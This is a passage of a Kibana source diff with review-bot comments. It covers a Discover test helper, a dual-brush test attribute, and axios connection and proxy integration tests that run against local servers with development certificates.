+    await this.testSubjects.click('discover-dataView-switch-link');
+    const indexPatternSwitcher = await this.testSubjects.find('indexPattern-switcher');
+    const li = await indexPatternSwitcher.findAllByTagName('li');
+    const items = await Promise.all(li.map((lis) => lis.getVisibleText()));
+    await this.testSubjects.click('discover-dataView-switch-link');
+    return items;
+  }
+
   public async selectTextBaseLang(lang: 'SQL') {
     await this.testSubjects.click('discover-dataView-switch-link');
     await this.find.clickByCssSelector(
diff --git a/tsconfig.base.json b/tsconfig.base.json
index 36988b9e4e9f0..68882faec661a 100644
--- a/tsconfig.base.json
+++ b/tsconfig.base.json
@@ -151,8 +151,6 @@
     "@kbn/screenshot-mode-plugin/*": ["src/plugins/screenshot_mode/*"],
     "@kbn/share-plugin": ["src/plugins/share"],
     "@kbn/share-plugin/*": ["src/plugins/share/*"],
-    "@kbn/shared-ux-plugin": ["src/plugins/shared_ux"],
-    "@kbn/shared-ux-plugin/*": ["src/plugins/shared_ux/*"],
     "@kbn/telemetry-collection-manager-plugin": ["src/plugins/telemetry_collection_manager"],
     "@kbn/telemetry-collection-manager-plugin/*": ["src/plugins/telemetry_collection_manager/*"],
     "@kbn/telemetry-management-section-plugin": ["src/plugins/telemetry_management_section"],
diff --git a/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx b/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx
index c593da55ffded..7dc3274c73228 100644
--- a/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx
+++ b/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx
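Review bot: `getIndexPatterns` opens the data-view switcher with one click and closes it with another, but if `find('indexPattern-switcher')`, `findAllByTagName('li')` or any `getVisibleText()` rejects, the closing click never runs and the popover is left open for the next step of the test. Moving the read into `try { … } finally { await this.testSubjects.click('discover-dataView-switch-link'); }` guarantees the toggle is undone on every path. The method also declares no return type; `public async getIndexPatterns(): Promise<string[]>` plus a one-line doc comment `/** Returns the visible labels listed in the data-view switcher, leaving the popover closed. */` would match the rest of this page object.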
@@ -234,6 +234,10 @@ export function DualBrush({ .attr('id', (b: DualBrush) => { return 'aiops-brush-' + b.id; }) + .attr('data-test-subj', (b: DualBrush) => { + // Uppercase the first character of the `id` so we get aiopsBrushBaseline/aiopsBrushDeviation. + return 'aiopsBrush' + b.id.charAt(0).toUpperCase() + b.id.slice(1); + }) .each((brushObject: DualBrush, i, n) => { const x = d3.scaleLinear().domain([min, max]).rangeRound([0, widthRef.current]); brushObject.brush(d3.select(n[i])); @@ -314,6 +318,7 @@ export function DualBrush({ {width > 0 && ( {!isRunning && ( )} {isRunning && ( - - + + )} diff --git a/x-pack/plugins/actions/jest.integration.config.js b/x-pack/plugins/actions/jest.integration.config.js new file mode 100644 index 0000000000000..41bd46b12005e --- /dev/null +++ b/x-pack/plugins/actions/jest.integration.config.js @@ -0,0 +1,12 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +module.exports = { + preset: '@kbn/test/jest_integration_node', + rootDir: '../../..', + roots: ['/x-pack/plugins/actions'], +}; diff --git a/x-pack/plugins/actions/server/builtin_action_types/lib/axios_utils_connection.test.ts b/x-pack/plugins/actions/server/builtin_action_types/lib/axios_utils_connection.test.ts deleted file mode 100644 index d5daa33cbb47c..0000000000000 --- a/x-pack/plugins/actions/server/builtin_action_types/lib/axios_utils_connection.test.ts +++ /dev/null 
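Review bot: The added `data-test-subj` builds its value from `b.id` at runtime, so the ids the new comment promises, `aiopsBrushBaseline` and `aiopsBrushDeviation`, exist nowhere as string literals and a test author grepping for them will not find this source. If `id` is always one of those two brushes, a lookup such as `const BRUSH_TEST_SUBJ = { baseline: 'aiopsBrushBaseline', deviation: 'aiopsBrushDeviation' } as const;` keeps the ids greppable and type-checked; if the set of ids is open-ended, keep the current code but reword the comment to say the mapping is generic. The second hunk's JSX is stripped in this rendering, so I cannot review it.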
@@ -1,284 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { readFileSync as fsReadFileSync } from 'fs'; -import { resolve as pathResolve, join as pathJoin } from 'path'; -import http from 'http'; -import https from 'https'; -import axios from 'axios'; -import { duration as momentDuration } from 'moment'; -import { schema } from '@kbn/config-schema'; - -import { request } from './axios_utils'; -import { ByteSizeValue } from '@kbn/config-schema'; -import { Logger } from '@kbn/core/server'; -import { loggingSystemMock } from '@kbn/core/server/mocks'; -import { createReadySignal } from '@kbn/event-log-plugin/server/lib/ready_signal'; -import { ActionsConfig } from '../../config'; -import { - ActionsConfigurationUtilities, - getActionsConfigurationUtilities, -} from '../../actions_config'; - -const logger = loggingSystemMock.create().get() as jest.Mocked; - -const CERT_DIR = '../../../../../../../packages/kbn-dev-utils/certs'; - -const KIBANA_CRT_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.crt')); -const KIBANA_KEY_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.key')); -const CA_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'ca.crt')); - -const KIBANA_KEY = fsReadFileSync(KIBANA_KEY_FILE, 'utf8'); -const KIBANA_CRT = fsReadFileSync(KIBANA_CRT_FILE, 'utf8'); -const CA = fsReadFileSync(CA_FILE, 'utf8'); - -describe('axios connections', () => { - let testServer: http.Server | https.Server; - // eslint-disable-next-line @typescript-eslint/no-explicit-any - let savedAxiosDefaultsAdapter: any; - - beforeAll(() => { - // needed to prevent the dreaded Error: Cross origin http://localhost forbidden - // see: https://github.com/axios/axios/issues/1754#issuecomment-572778305 - savedAxiosDefaultsAdapter = axios.defaults.adapter; 
- axios.defaults.adapter = require('axios/lib/adapters/http'); - }); - - afterAll(() => { - axios.defaults.adapter = savedAxiosDefaultsAdapter; - }); - - beforeEach(() => { - jest.resetAllMocks(); - }); - - afterEach(() => { - testServer.close(); - }); - - describe('http', () => { - test('it works', async () => { - const { url, server } = await createServer(); - testServer = server; - - const configurationUtilities = getACUfromConfig(); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - }); - - describe('https', () => { - test('it fails with self-signed cert and no overrides', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig(); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it works with verificationMode "none" config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - ssl: { - verificationMode: 'none', - }, - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it works with verificationMode "none" for custom host config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { verificationMode: 'none' } }], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it works with ca in custom host config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: CA } }], - }); - const res = 
await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it fails with incorrect ca in custom host config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it works with incorrect ca in custom host config but verificationMode "none"', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [ - { - url, - ssl: { - certificateAuthoritiesData: CA, - verificationMode: 'none', - }, - }, - ], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it works with incorrect ca in custom host config but verificationMode config "full"', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - ssl: { - verificationMode: 'none', - }, - customHostSettings: [ - { - url, - ssl: { - certificateAuthoritiesData: CA, - }, - }, - ], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it fails with no matching custom host settings', async () => { - const { url, server } = await createServer(true); - const otherUrl = 'https://example.com'; - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url: otherUrl, ssl: { verificationMode: 'none' } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it 
fails cleanly with a garbage CA 1', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: 'garbage' } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it fails cleanly with a garbage CA 2', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const ca = '-----BEGIN CERTIFICATE-----\ngarbage\n-----END CERTIFICATE-----\n'; - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: ca } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - }); -}); - -interface CreateServerResult { - url: string; - server: http.Server | https.Server; -} - -async function createServer(useHttps: boolean = false): Promise { - let server: http.Server | https.Server; - const readySignal = createReadySignal(); - - if (!useHttps) { - server = http.createServer((req, res) => { - res.writeHead(200); - res.end('http: just testing that a connection could be made'); - }); - } else { - const httpsOptions = { - cert: KIBANA_CRT, - key: KIBANA_KEY, - }; - server = https.createServer(httpsOptions, (req, res) => { - res.writeHead(200); - res.end('https: just testing that a connection could be made'); - }); - } - - server.listen(() => { - const addressInfo = server.address(); - if (addressInfo == null || typeof addressInfo === 'string') { - server.close(); - throw new Error('error getting address of server, closing'); - } - - const url = localUrlFromPort(useHttps, addressInfo.port, 'localhost'); - readySignal.signal({ server, url }); - }); - - // let the node process stop if for some reason this server isn't closed - server.unref(); - - 
return readySignal.wait(); -} - -const BaseActionsConfig: ActionsConfig = { - allowedHosts: ['*'], - enabledActionTypes: ['*'], - preconfiguredAlertHistoryEsIndex: false, - preconfigured: {}, - proxyUrl: undefined, - proxyHeaders: undefined, - proxyRejectUnauthorizedCertificates: true, - ssl: { - proxyVerificationMode: 'full', - verificationMode: 'full', - }, - proxyBypassHosts: undefined, - proxyOnlyHosts: undefined, - rejectUnauthorized: true, - maxResponseContentLength: ByteSizeValue.parse('1mb'), - responseTimeout: momentDuration(1000 * 30), - customHostSettings: undefined, - cleanupFailedExecutionsTask: { - enabled: true, - cleanupInterval: schema.duration().validate('5m'), - idleInterval: schema.duration().validate('1h'), - pageSize: 100, - }, -}; - -function getACUfromConfig(config: Partial = {}): ActionsConfigurationUtilities { - return getActionsConfigurationUtilities({ - ...BaseActionsConfig, - ...config, - }); -} - -function localUrlFromPort(useHttps: boolean, port: number, host: string): string { - return `${useHttps ? 'https' : 'http'}://${host}:${port}`; -} diff --git a/x-pack/plugins/actions/server/integration_tests/axios_utils_connection.test.ts b/x-pack/plugins/actions/server/integration_tests/axios_utils_connection.test.ts new file mode 100644 index 0000000000000..2b5a137ed0bcc --- /dev/null +++ b/x-pack/plugins/actions/server/integration_tests/axios_utils_connection.test.ts 
@@ -0,0 +1,595 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const proxySetup = require('proxy'); + +import { readFileSync as fsReadFileSync } from 'fs'; +import { resolve as pathResolve, join as pathJoin } from 'path'; +import http from 'http'; +import https from 'https'; +import axios from 'axios'; +import { duration as momentDuration } from 'moment'; +import { schema } from '@kbn/config-schema'; +import getPort from 'get-port'; + +import { request } from '../builtin_action_types/lib/axios_utils'; +import { ByteSizeValue } from '@kbn/config-schema'; +import { Logger } from '@kbn/core/server'; +import { loggingSystemMock } from '@kbn/core/server/mocks'; +import { createReadySignal } from '@kbn/event-log-plugin/server/lib/ready_signal'; +import { ActionsConfig } from '../config'; +import { ActionsConfigurationUtilities, getActionsConfigurationUtilities } from '../actions_config'; +import { resolveCustomHosts } from '../lib/custom_host_settings'; + +const logger = loggingSystemMock.create().get() as jest.Mocked; + +const CERT_DIR = '../../../../../../packages/kbn-dev-utils/certs'; + +const KIBANA_CRT_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.crt')); +const KIBANA_KEY_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.key')); +const CA_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'ca.crt')); + +const KIBANA_KEY = fsReadFileSync(KIBANA_KEY_FILE, 'utf8'); +const KIBANA_CRT = fsReadFileSync(KIBANA_CRT_FILE, 'utf8'); +const CA = fsReadFileSync(CA_FILE, 'utf8'); + +const Auth = 'elastic:changeme'; +const AuthB64 = Buffer.from(Auth).toString('base64'); + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const AxiosDefaultsAadapter = 
require('axios/lib/adapters/http'); + +describe('axios connections', () => { + let testServer: http.Server | https.Server | null; + // eslint-disable-next-line @typescript-eslint/no-explicit-any + let savedAxiosDefaultsAdapter: any; + + beforeEach(() => { + // needed to prevent the dreaded Error: Cross origin http://localhost forbidden + // see: https://github.com/axios/axios/issues/1754#issuecomment-572778305 + savedAxiosDefaultsAdapter = axios.defaults.adapter; + axios.defaults.adapter = AxiosDefaultsAadapter; + }); + + afterEach(() => { + axios.defaults.adapter = savedAxiosDefaultsAdapter; + }); + + beforeEach(() => { + jest.resetAllMocks(); + }); + + afterEach(() => { + testServer?.close(); + testServer = null; + }); + + describe('http', () => { + test('it works', async () => { + const { url, server } = await createServer({ useHttps: false }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + }); + + describe('https', () => { + test('it fails with self-signed cert and no overrides', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig(); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with verificationMode "none" config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it works with verificationMode "none" for custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = 
server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { verificationMode: 'none' } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it works with ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: CA } }], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it fails with incorrect ca in custom host config', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it works with incorrect ca in custom host config but verificationMode "none"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + verificationMode: 'none', + }, + }, + ], + }); + const res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it works with incorrect ca in custom host config but verificationMode config "full"', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + ssl: { + verificationMode: 'none', + }, + customHostSettings: [ + { + url, + ssl: { + certificateAuthoritiesData: CA, + }, + }, + ], + }); + const 
res = await request({ axios, url, logger, configurationUtilities }); + expect(res.status).toBe(200); + }); + + test('it fails with no matching custom host settings', async () => { + const { url, server } = await createServer({ useHttps: true }); + const otherUrl = 'https://example.com'; + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url: otherUrl, ssl: { verificationMode: 'none' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 1', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: 'garbage' } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + + test('it fails cleanly with a garbage CA 2', async () => { + const { url, server } = await createServer({ useHttps: true }); + testServer = server; + + const ca = '-----BEGIN CERTIFICATE-----\ngarbage\n-----END CERTIFICATE-----\n'; + const configurationUtilities = getACUfromConfig({ + customHostSettings: [{ url, ssl: { certificateAuthoritiesData: ca } }], + }); + const fn = async () => await request({ axios, url, logger, configurationUtilities }); + await expect(fn()).rejects.toThrow('certificate'); + }); + }); + + // targetHttps, proxyHttps, and proxyAuth should all range over [false, true], but + // currently the true versions are not passing + describe(`proxy`, () => { + for (const targetHttps of [false]) { + for (const targetAuth of [false, true]) { + for (const proxyHttps of [false]) { + for (const proxyAuth of [false]) { + const targetLabel = testLabel('target', targetHttps, targetAuth); + const proxyLabel = testLabel('proxy', proxyHttps, 
proxyAuth); + const testName = `${targetLabel} :: ${proxyLabel}`; + + const opts = { targetHttps, targetAuth, proxyHttps, proxyAuth }; + + test(`basic; ${testName}`, async () => await basicProxyTest(opts)); + + if (targetAuth) { + test(`wrong target password; ${testName}`, async () => + await wrongTargetPasswordProxyTest(opts)); + + test(`missing target password; ${testName}`, async () => + await missingTargetPasswordProxyTest(opts)); + } + + if (proxyAuth) { + test(`wrong proxy password; ${testName}`, async () => + await wrongProxyPasswordProxyTest(opts)); + + test(`missing proxy password; ${testName}`, async () => + await missingProxyPasswordProxyTest(opts)); + } + + if (targetHttps) { + test(`missing CA; ${testName}`, async () => + await missingCaProxyTest(opts)); + + test(`rejectUnauthorized target; ${testName}`, async () => + await rejectUnauthorizedTargetProxyTest(opts)); + + test(`custom CA target; ${testName}`, async () => + await customCAProxyTest(opts)); + + test(`verModeNone target; ${testName}`, async () => + await verModeNoneTargetProxyTest(opts)); + } + } + } + } + } + }); +}); + +async function basicProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +async function wrongTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const wrongUrl = manglePassword(target.url); + const res = await request({ ...axiosDefaults, url: wrongUrl, 
configurationUtilities: acu }); + expect(res.status).toBe(403); + }); +} + +async function missingTargetPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + ssl: { verificationMode: 'none' }, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const anonUrl = removePassword(target.url); + const res = await request({ ...axiosDefaults, url: anonUrl, configurationUtilities: acu }); + expect(res.status).toBe(401); + }); +} + +async function wrongProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const wrongUrl = manglePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: wrongUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingProxyPasswordProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const anonUrl = removePassword(proxy.url); + const acu = getACUfromConfig({ + proxyUrl: anonUrl, + ssl: { verificationMode: 'none' }, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.message).toMatch('407'); + } + }); +} + +async function missingCaProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + }); + + try { + await request({ ...axiosDefaults, configurationUtilities: acu }); + expect('request should have thrown error').toBeUndefined(); + } catch (err) { + expect(err.code).toEqual('UNABLE_TO_VERIFY_LEAF_SIGNATURE'); + } + }); +} + 
+async function rejectUnauthorizedTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + rejectUnauthorized: false, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +async function customCAProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { certificateAuthoritiesData: CA } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +async function verModeNoneTargetProxyTest(opts: RunTestOptions) { + await runWithSetup(opts, async (target, proxy, axiosDefaults) => { + const acu = getACUfromConfig({ + proxyUrl: proxy.url, + customHostSettings: [{ url: target.url, ssl: { verificationMode: 'none' } }], + }); + + const res = await request({ ...axiosDefaults, configurationUtilities: acu }); + expect(res.status).toBe(200); + }); +} + +interface RunTestOptions { + targetHttps: boolean; + targetAuth: boolean; + proxyHttps: boolean; + proxyAuth: boolean; +} + +type AxiosParams = Parameters[0]; + +type Test = ( + target: CreateServerResult, + proxy: CreateProxyResult, + axiosDefaults: AxiosParams +) => Promise; + +async function runWithSetup(opts: RunTestOptions, fn: Test) { + const target = await createServer({ + useHttps: opts.targetHttps, + requireAuth: opts.targetAuth, + }); + + const proxy = await createProxy({ + useHttps: opts.proxyHttps, + requireAuth: opts.proxyAuth, + }); + + const axiosDefaults = { + axios, + logger, + validateStatus, + url: target.url, + configurationUtilities: getACUfromConfig({ + proxyUrl: proxy.url, + }), + }; + + try { + await fn(target, proxy, 
axiosDefaults); + } catch (err) { + expect(err).toBeUndefined(); + } + + target.server.close(); + proxy.server.close(); +} + +function testLabel(type: string, tls: boolean, auth: boolean) { + return `${type} https ${tls ? 'X' : '-'} auth ${auth ? 'X' : '-'}`; +} + +function validateStatus(status: number) { + return true; +} + +function manglePassword(url: string) { + const parsed = new URL(url); + parsed.password = `nope-${parsed.password}-nope`; + return parsed.toString(); +} + +function removePassword(url: string) { + const parsed = new URL(url); + parsed.username = ''; + parsed.password = ''; + return parsed.toString(); +} + +const TlsOptions = { + cert: KIBANA_CRT, + key: KIBANA_KEY, +}; + +interface CreateServerOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateServerResult { + url: string; + server: http.Server | https.Server; +} + +async function createServer(options: CreateServerOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = `http${useHttps ? 's' : ''}://${requireAuth ? 
`${Auth}@` : ''}localhost:${port}`; + + function requestHandler(req: http.IncomingMessage, res: http.ServerResponse) { + if (requireAuth) { + const auth = req.headers.authorization; + if (auth == null) { + res.setHeader('WWW-Authenticate', 'Basic'); + res.writeHead(401); + res.end('authorization required'); + return; + } + if (auth !== `Basic ${AuthB64}`) { + res.writeHead(403); + res.end('not authorized'); + return; + } + } + + res.writeHead(200); + res.end('http: just testing that a connection could be made'); + } + + let server: http.Server | https.Server; + if (!useHttps) { + server = http.createServer(requestHandler); + } else { + server = https.createServer(TlsOptions, requestHandler); + } + server.unref(); + + const readySignal = createReadySignal(); + server.listen(port, 'localhost', () => { + readySignal.signal({ url, server }); + }); + + return readySignal.wait(); +} + +interface CreateProxyOptions { + useHttps: boolean; + requireAuth?: boolean; +} + +interface CreateProxyResult { + url: string; + server: http.Server | https.Server; +} + +type AuthenticateCallback = (err: null | Error, authenticated: boolean) => void; + +interface IAuthenticate { + authenticate(req: http.IncomingMessage, callback: AuthenticateCallback): void; +} + +async function createProxy(options: CreateProxyOptions): Promise { + const { useHttps, requireAuth = false } = options; + const port = await getPort(); + const url = getUrl(useHttps, requireAuth, port); + let proxyServer: http.Server | https.Server; + + if (!useHttps) { + proxyServer = http.createServer(); + } else { + proxyServer = https.createServer(TlsOptions); + } + proxyServer.unref(); + + proxySetup(proxyServer); + if (requireAuth) { + (proxyServer as unknown as IAuthenticate).authenticate = (req, callback) => { + const auth = req.headers['proxy-authorization']; + callback(null, auth === `Basic ${AuthB64}`); + }; + } + + const readySignal = createReadySignal(); + + proxyServer.listen(port, 'localhost', () => { + 
readySignal.signal({ server: proxyServer, url }); + }); + + return readySignal.wait(); +} + +function getUrl(useHttps: boolean, requiresAuth: boolean, port: number) { + return `http${useHttps ? 's' : ''}://${requiresAuth ? `${Auth}@` : ''}localhost:${port}`; +} + +const BaseActionsConfig: ActionsConfig = { + allowedHosts: ['*'], + enabledActionTypes: ['*'], + preconfiguredAlertHistoryEsIndex: false, + preconfigured: {}, + proxyUrl: undefined, + proxyHeaders: undefined, + proxyRejectUnauthorizedCertificates: true, + ssl: { + proxyVerificationMode: 'full', + verificationMode: 'full', + }, + proxyBypassHosts: undefined, + proxyOnlyHosts: undefined, + rejectUnauthorized: true, + maxResponseContentLength: ByteSizeValue.parse('1mb'), + responseTimeout: momentDuration(1000 * 30), + customHostSettings: undefined, + cleanupFailedExecutionsTask: { + enabled: true, + cleanupInterval: schema.duration().validate('5m'), + idleInterval: schema.duration().validate('1h'), + pageSize: 100, + }, +}; + +function getACUfromConfig(config: Partial = {}): ActionsConfigurationUtilities { + const resolvedConfig = resolveCustomHosts(logger, { ...BaseActionsConfig, ...config }); + return getActionsConfigurationUtilities(resolvedConfig); +} diff --git a/x-pack/plugins/actions/server/integration_tests/axios_utils_proxy.test.ts b/x-pack/plugins/actions/server/integration_tests/axios_utils_proxy.test.ts new file mode 100644 index 0000000000000..48aca5cd7381f --- /dev/null +++ b/x-pack/plugins/actions/server/integration_tests/axios_utils_proxy.test.ts 
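Review bot: The tests titled `it works with incorrect ca in custom host config but verificationMode "none"` and `… but verificationMode config "full"` both pass the correct `CA` in `certificateAuthoritiesData`, so they would return 200 even if `verificationMode: 'none'` did not override the CA check, and neither exercises the override its name claims; the second also configures `verificationMode: 'none'` while its title says "full", so the expected outcome is unclear. Using the leaf cert as the wrong authority, `customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT, verificationMode: 'none' } }]`, mirrors the adjacent `it fails with incorrect ca in custom host config` case and makes the 200 actually depend on verification being disabled. Separately, because `proxyHttps` and `proxyAuth` only iterate over `[false]`, `wrongProxyPasswordProxyTest`, `missingProxyPasswordProxyTest` and the four `targetHttps` cases are never registered, so the 407 and TLS-through-proxy paths have no coverage and the gap does not appear in the test report; registering them under the `true` values with `test.skip`/`test.todo` would at least make it visible.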
@@ -0,0 +1,607 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +// eslint-disable-next-line @typescript-eslint/no-var-requires +const proxySetup = require('proxy'); + +import { readFileSync as fsReadFileSync } from 'fs'; +import { resolve as pathResolve, join as pathJoin } from 'path'; +import http from 'http'; +import https from 'https'; +import axios from 'axios'; +import { duration as momentDuration } from 'moment'; +import { schema } from '@kbn/config-schema'; +import getPort from 'get-port'; + +import { request } from '../builtin_action_types/lib/axios_utils'; +import { ByteSizeValue } from '@kbn/config-schema'; +import { Logger } from '@kbn/core/server'; +import { loggingSystemMock } from '@kbn/core/server/mocks'; +import { createReadySignal } from '@kbn/event-log-plugin/server/lib/ready_signal'; +import { ActionsConfig } from '../config'; +import { ActionsConfigurationUtilities, getActionsConfigurationUtilities } from '../actions_config'; +import { resolveCustomHosts } from '../lib/custom_host_settings'; + +const logger = loggingSystemMock.create().get() as jest.Mocked; + +const CERT_DIR = '../../../../../../packages/kbn-dev-utils/certs'; + +const KIBANA_CRT_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.crt')); +const KIBANA_KEY_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.key')); +const CA_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'ca.crt')); + +const KIBANA_KEY = fsReadFileSync(KIBANA_KEY_FILE, 'utf8'); +const KIBANA_CRT = fsReadFileSync(KIBANA_CRT_FILE, 'utf8'); +const CA = fsReadFileSync(CA_FILE, 'utf8'); + +const 